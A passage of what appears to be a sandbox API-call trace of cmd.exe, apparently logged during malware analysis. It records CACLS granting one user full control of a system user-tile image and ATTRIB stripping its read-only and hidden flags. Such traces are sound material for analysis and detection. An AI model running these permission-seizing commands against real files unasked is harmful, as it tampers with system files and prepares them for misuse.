nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0190.841] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.841] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.841] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.841] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0190.841] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0190.841] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0190.841] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0190.841] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0190.841] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0190.841] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0190.841] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0190.841] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0190.841] GetEnvironmentStringsW () returned 0x342458* [0190.842] FreeEnvironmentStringsW (penv=0x342458) returned 1 [0190.842] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.842] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.842] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0190.842] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0190.842] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0190.842] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") 
returned 8 [0190.842] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0190.842] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0190.842] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0190.842] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0190.842] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f748 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.842] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f748, lpFilePart=0x14f744 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f744*="Desktop") returned 0x18 [0190.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.842] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f4c4 | out: lpFindFileData=0x14f4c4) returned 0x340ae8 [0190.842] FindClose (in: hFindFile=0x340ae8 | out: hFindFile=0x340ae8) returned 1 [0190.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f4c4 | out: lpFindFileData=0x14f4c4) returned 0x340ae8 [0190.842] FindClose (in: hFindFile=0x340ae8 | out: hFindFile=0x340ae8) returned 1 [0190.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f4c4 | out: lpFindFileData=0x14f4c4) returned 0x340ae8 [0190.843] FindClose (in: hFindFile=0x340ae8 | out: hFindFile=0x340ae8) returned 1 [0190.843] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.843] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0190.843] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0190.843] GetEnvironmentStringsW () returned 0x340308* [0190.843] FreeEnvironmentStringsW (penv=0x340308) returned 1 [0190.843] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.843] GetConsoleOutputCP () returned 0x1b5 [0190.843] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.843] GetUserDefaultLCID () returned 0x409 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f888, cchData=128 | out: lpLCData="0") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f888, cchData=128 | out: lpLCData="0") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f888, cchData=128 | out: lpLCData="1") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 
[0190.844] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0190.845] GetConsoleTitleW (in: lpConsoleTitle=0x3309b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.845] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.845] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0190.845] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0190.845] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0190.846] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0190.847] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0190.847] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0190.847] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0190.847] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0190.847] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0190.847] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0190.847] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0190.849] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0190.849] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0190.849] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0190.849] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0190.849] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0190.849] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0190.849] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0190.851] GetConsoleTitleW (in: lpConsoleTitle=0x14f51c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.852] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0190.852] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0190.852] _wcsicmp (_String1="CACLS", 
_String2="DEL") returned -1 [0190.852] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0190.852] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0190.852] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0190.852] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0190.852] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0190.852] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0190.852] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0190.852] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0190.852] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0190.852] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0190.852] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0190.852] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0190.852] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0190.852] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0190.852] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0190.852] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0190.852] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0190.852] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0190.852] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0190.852] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0190.852] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0190.852] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0190.852] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0190.852] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0190.852] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0190.852] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0190.852] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0190.852] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0190.852] _wcsicmp (_String1="CACLS", 
_String2="START") returned -16 [0190.852] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0190.852] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0190.852] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0190.852] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0190.852] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0190.852] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0190.852] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0190.852] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0190.852] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0190.852] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0190.852] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0190.853] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0190.853] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0190.853] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0190.853] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0190.853] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0190.853] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0190.853] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0190.853] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0190.853] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0190.853] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0190.853] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0190.853] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0190.853] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0190.853] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0190.853] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0190.853] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0190.853] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0190.853] _wcsicmp (_String1="CACLS", 
_String2="RMDIR") returned -15 [0190.853] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0190.853] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0190.853] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0190.853] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0190.853] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0190.853] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0190.853] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0190.853] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0190.853] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0190.853] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0190.853] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0190.853] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0190.853] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0190.853] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0190.853] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0190.853] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0190.853] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0190.853] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0190.853] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0190.853] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0190.853] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0190.853] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0190.853] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0190.853] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0190.853] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0190.853] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0190.854] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0190.854] SetErrorMode (uMode=0x0) returned 0x0 [0190.854] SetErrorMode (uMode=0x1) 
returned 0x0 [0190.854] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x341e98, lpFilePart=0x14f03c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f03c*="Desktop") returned 0x18 [0190.854] SetErrorMode (uMode=0x0) returned 0x1 [0190.854] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.854] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0190.859] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.919] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0190.920] GetLastError () returned 0x2 [0190.920] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0190.920] GetLastError () returned 0x2 [0190.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0x342180 [0190.920] FindClose (in: hFindFile=0x342180 | out: hFindFile=0x342180) returned 1 [0190.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0190.920] GetLastError () returned 0x2 [0190.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x14edb8, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0x342180 [0190.921] FindClose (in: hFindFile=0x342180 | out: hFindFile=0x342180) returned 1 [0190.921] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0190.921] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0190.921] GetConsoleTitleW (in: lpConsoleTitle=0x14f2b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.921] InitializeProcThreadAttributeList (in: lpAttributeList=0x14f138, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f200 | out: lpAttributeList=0x14f138, lpSize=0x14f200) returned 1 [0190.921] UpdateProcThreadAttribute (in: lpAttributeList=0x14f138, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f1f8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f138, lpPreviousValue=0x0) returned 1 [0190.921] GetStartupInfoW (in: lpStartupInfo=0x14f0f4 | out: lpStartupInfo=0x14f0f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0190.921] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0190.922] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14f194*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, 
dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f1e0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x14f1e0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xab0, dwThreadId=0x858)) returned 1 [0190.924] CloseHandle (hObject=0x4c) returned 1 [0190.924] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0190.924] GetEnvironmentStringsW () returned 0x340308* [0190.924] FreeEnvironmentStringsW (penv=0x340308) returned 1 [0190.924] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0191.061] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x14f0d4 | out: lpExitCode=0x14f0d4*=0x0) returned 1 [0191.061] CloseHandle (hObject=0x50) returned 1 [0191.061] _vsnwprintf (in: _Buffer=0x14f21c, _BufferCount=0x13, _Format="%08X", _ArgList=0x14f0e0 | out: _Buffer="00000000") returned 8 [0191.061] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.061] GetEnvironmentStringsW () returned 0x342410* [0191.061] FreeEnvironmentStringsW (penv=0x342410) returned 1 [0191.061] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.061] GetEnvironmentStringsW () returned 0x342410* [0191.061] FreeEnvironmentStringsW (penv=0x342410) returned 1 [0191.061] DeleteProcThreadAttributeList (in: lpAttributeList=0x14f138 | out: lpAttributeList=0x14f138) [0191.061] GetConsoleTitleW (in: lpConsoleTitle=0x14f51c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.061] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.061] 
NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0191.061] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.062] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0191.062] GetLastError () returned 0x2 [0191.062] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0191.062] GetLastError () returned 0x2 [0191.062] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0x33e4d8 [0191.062] FindClose (in: hFindFile=0x33e4d8 | out: hFindFile=0x33e4d8) returned 1 [0191.062] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0191.062] GetLastError () returned 0x2 [0191.063] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0x33e4d8 [0191.063] FindClose (in: hFindFile=0x33e4d8 | out: hFindFile=0x33e4d8) returned 1 [0191.063] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0191.063] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0191.063] GetConsoleTitleW (in: lpConsoleTitle=0x14f2b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.063] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x14f138, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f200 | out: lpAttributeList=0x14f138, lpSize=0x14f200) returned 1 [0191.063] UpdateProcThreadAttribute (in: lpAttributeList=0x14f138, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f1f8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f138, lpPreviousValue=0x0) returned 1 [0191.063] GetStartupInfoW (in: lpStartupInfo=0x14f0f4 | out: lpStartupInfo=0x14f0f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0191.063] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0191.063] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14f194*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f1e0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"", lpProcessInformation=0x14f1e0*(hProcess=0x4c, hThread=0x50, dwProcessId=0x98c, dwThreadId=0xb48)) returned 1 [0191.065] CloseHandle (hObject=0x50) 
returned 1 [0191.065] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0191.065] GetEnvironmentStringsW () returned 0x342410* [0191.065] FreeEnvironmentStringsW (penv=0x342410) returned 1 [0191.065] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0191.137] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x14f0d4 | out: lpExitCode=0x14f0d4*=0x0) returned 1 [0191.137] CloseHandle (hObject=0x4c) returned 1 [0191.137] _vsnwprintf (in: _Buffer=0x14f21c, _BufferCount=0x13, _Format="%08X", _ArgList=0x14f0e0 | out: _Buffer="00000000") returned 8 [0191.137] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.137] GetEnvironmentStringsW () returned 0x342410* [0191.137] FreeEnvironmentStringsW (penv=0x342410) returned 1 [0191.137] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.137] GetEnvironmentStringsW () returned 0x342410* [0191.137] FreeEnvironmentStringsW (penv=0x342410) returned 1 [0191.137] DeleteProcThreadAttributeList (in: lpAttributeList=0x14f138 | out: lpAttributeList=0x14f138) [0191.137] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.138] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.138] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.138] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.138] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.138] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.138] SetConsoleInputExeNameW () returned 0x1 [0191.138] GetConsoleOutputCP () returned 0x1b5 [0191.138] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.138] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.138] exit (_Code=0) Process: id = "422" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0x890" os_integrity_level = "0x3000" 
